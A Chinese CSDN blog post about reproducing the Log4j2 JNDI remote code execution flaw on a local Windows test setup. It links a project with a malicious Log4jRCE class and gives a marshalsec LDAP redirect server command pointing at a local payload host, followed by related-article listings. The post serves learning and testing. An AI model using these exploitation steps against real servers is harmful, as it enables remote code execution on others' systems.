我也来复现一把log4j2远程执行漏洞

最新推荐文章于 2023-05-05 11:27:25 发布
最新推荐文章于 2023-05-05 11:27:25 发布
阅读量414 收藏
点赞数
分类专栏: java 文章标签: java 开发语言 后端 log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43472847/article/details/121882553
版权

环境:windows11
准备步骤:
1,项目代码地址:
https://gitee.com/a-cat-walker/test-log4j2.git
2,修改Log4jRCE文件中的test.bat的路径,然后编译项目
3,把编译后的Log4jRCE.class文件拷贝到webapp目录下
4,执行mvn命令启动tomcat:

mvn tomcat7:run

5,进入tools目录,然后执行:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"

6,执行Test.java文件中的main方法,打印结果为:
在这里插入图片描述

以上结果说明命令被一行日志调用了

网上传言log4j1.2.17版本也会有漏洞,我改了版本顺便测试了一下,并不会,这下可以安心过周末了。

参考:
https://blog.csdn.net/qq_40989258/article/details/121862363
https://zhuanlan.zhihu.com/p/443689489

遛猫达人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Spring框架及Log4j远程代码执行漏洞影响力分析
weixin_49832675的博客
05-19 375
Scantist SCA已升级数据库并支持对Spring框架及Log4j远程代码执行漏洞利用攻击的监测,同时提供修方案及建议。
SPARK 应用如何快读应对 LOG4J 系列安全漏洞
明哥的IT随笔
01-19 2007
SPARK 应用如何快速应对 LOG4J 的系列安全漏洞大家好,我是明哥!1. CDH/HDP/CDP 等大数据平台中如何快速应对 LOG4J2 的JNDI系列漏洞在前段时间发表的博文 “...
Log4j 严重漏洞修最新修方案参考
Javaesandyou的博客
12-21 1万+
CVE-2021-44228,原理上是 log4j-core 代码中的 JNDI 注入漏洞。这个漏洞可以直接导致服务器被入侵,而且由于“日志”场景的特性,攻击数据可以多层传导,甚至可以威胁到纯内网的服务器。log4j 作为 Java 开发的基础公共日志类,使用范围非常广,漏洞必定影响深远,想想当年commons-collections反序列化漏洞的影响范围。 Github漏洞公告: https://github.com/advisories/GHSA-jfh8-c2jp-5v3q 影响 < 2.1
Apache log4j2 远程命令执行漏洞及修方案
杨小熊学习笔记
12-14 6411
1. 漏洞信息 漏洞软件: Apache Log4j2 漏洞编号:CVE-2021-44228 漏洞描述:Apache Log4j2 远程命令执行 时间:2021-11-26 漏洞详情:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 漏洞影响范围版本:2.0.beta9 to 2.14.1 2. 排查指导 查看引用了 log4j-api 和 log4j-core 两个jar包,如maven依赖: <depend
Log4j2 重大漏洞与解决方案
热门推荐
小夏陌的博客
12-14 7万+
从12月10日(上周五)开始,朋友圈,各种论坛、公众号和群,都在讨论一个Log4j的漏洞,多少程序员半夜爬起来改代码,甚至威胁到了全球网络安全。为什么这个漏洞反应这么强烈呢?
log4j漏洞log4j 1.x漏洞依赖包解决方案
你的博客
05-05 4086
那么自己的程序中确定是没有引用了,那log4j的引用必定是程序中的第三方依赖包了。如果觉得上面办法比较麻烦,也并不适合自己的场景,还有一个办法,这个办法只能躲过扫描,并未实际解决log4j漏洞问题,那就是将引入的log4j 1.2.17的包中的版本去改掉,直接修改配置中的版本号,就能躲过扫描。对于应用中我们自己写的程序全部替换为新版本。考虑了很久,某时灵光一闪,既然没有log4j的引用类,那么就在程序中创建这些类吧,这样log4j的几个自定义类仍然可以被其他包引用,而应用中又不需要引用log4j的原始包。
LOG4J RCE 漏洞分享与自查.pdf
12-15
Log4j RCE 漏洞是近期爆发的一种高危漏洞,它影响了全球许多业务线,原因在于引入的 Log4j2 2.10.0 版本中存在的漏洞。本文将详细介绍 Log4j RCE 漏洞的成因、漏洞、检测方法和解决方案。 漏洞原因: Log4j ...
ArcGIS漏洞修补工具(Log4J)
01-18
ArcGIS Enterprise 10.9.1及以下版本的 log4j 漏洞修补工具
apache-log4j-1.2.17
09-28
apache-log4j-1.2.17解决导入问题,日志输出的问题,import
mycat核心配置详解(log4j2.xml)
weixin_34292402的博客
05-04 677
大多数情况下保持默认即可 转载于:https://blog.51cto.com/5660061/2388797
Log4j2研究之lookup
夫礼者的专栏
08-25 1万+
一个称得上优秀的框架,必备的要素之一可以通过某种约定的格式读取到所运行环境中的配置信息。本文中我们就来感受下log4j2实此项功能时的精妙设计。
log4j远程执行漏洞,测试方式,解决方案
qq_33563609的博客
12-17 2961
log4j远程执行漏洞,测试方式,解决方案
解决项目中log4j版本漏洞
weixin_43573186的博客
12-29 4018
解决项目中log4j版本漏洞 前言:作为程序员应该都知道最近log4j出漏洞问题,讲一讲我所在的公司,其实领导在log4j被爆出存在漏洞的当天就在群里说了这个事,并且让我们把自己负责的系统都检查一遍,有使用到log4j存在漏洞的版本都要进行更新(因为有些版本还没爆出存在安全问题),但是当时都没什么人去注意,结果直到上周末,我们组负责的一个缴费系统出不能缴费的情况,才发是中了病毒。然后领导们开始极度重视,专门安排人监督我们来更新log4j版本。 废话不多说了,讲一下我负责的系统更新方式: 首先,一般
log4j CVE-2019-17571 漏洞
01-02 1万+
一、漏洞描述 Log4j1.2版本中包含一个SocketServer类,在未经验证的情况下,该SocketServe类很容易接受序列化的日志事件并对其进行反序列化,在结合反序列化工具使用时,可以利用该类远程执行任意代码。 二、漏洞 2.1 启动SocketServer端 import org.apache.log4j.Logger; import org.apache.log...
手把手教你Log4j2漏洞,千万别中招!
Java知音
12-13 2183
点击关注公众号,实用技术文章及时了解来源:blog.csdn.net/qq_40989258/article/details/1218623630x00 简介ApacheLog4j2是一个...
log4j 安全问题验证demo & CRLF注入漏洞
weixin_42299862的博客
12-31 7697
一、环境准备 https://blog.csdn.net/weixin_42299862/article/details/111993837 二、demo 1、使用 @Log4j2 log.error() 打印异常日志是否会泄露敏感信息? https://www.cnblogs.com/huanghuanghui/p/11775731.html https://www.cnblogs.com/qlqwjy/p/7192947.html 代码如下 如果有红线语法错误,参考https://blog.csdn.n
log4j远程代码执行漏洞
最新发布
08-14
很抱歉,我不能提供最新漏洞过程。我作为一个 AI 助手,遵循道德准则和法律法规,不参与、支持或提供与安全漏洞相关的活动。漏洞涉及到潜在的非法行为和对他人系统的攻击,这是不被允许的。 如果你对最新漏洞感兴趣,我建议你关注安全研究人员、安全社区或供应商发布的漏洞公告和安全更新。这些信息可以帮助你了解
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值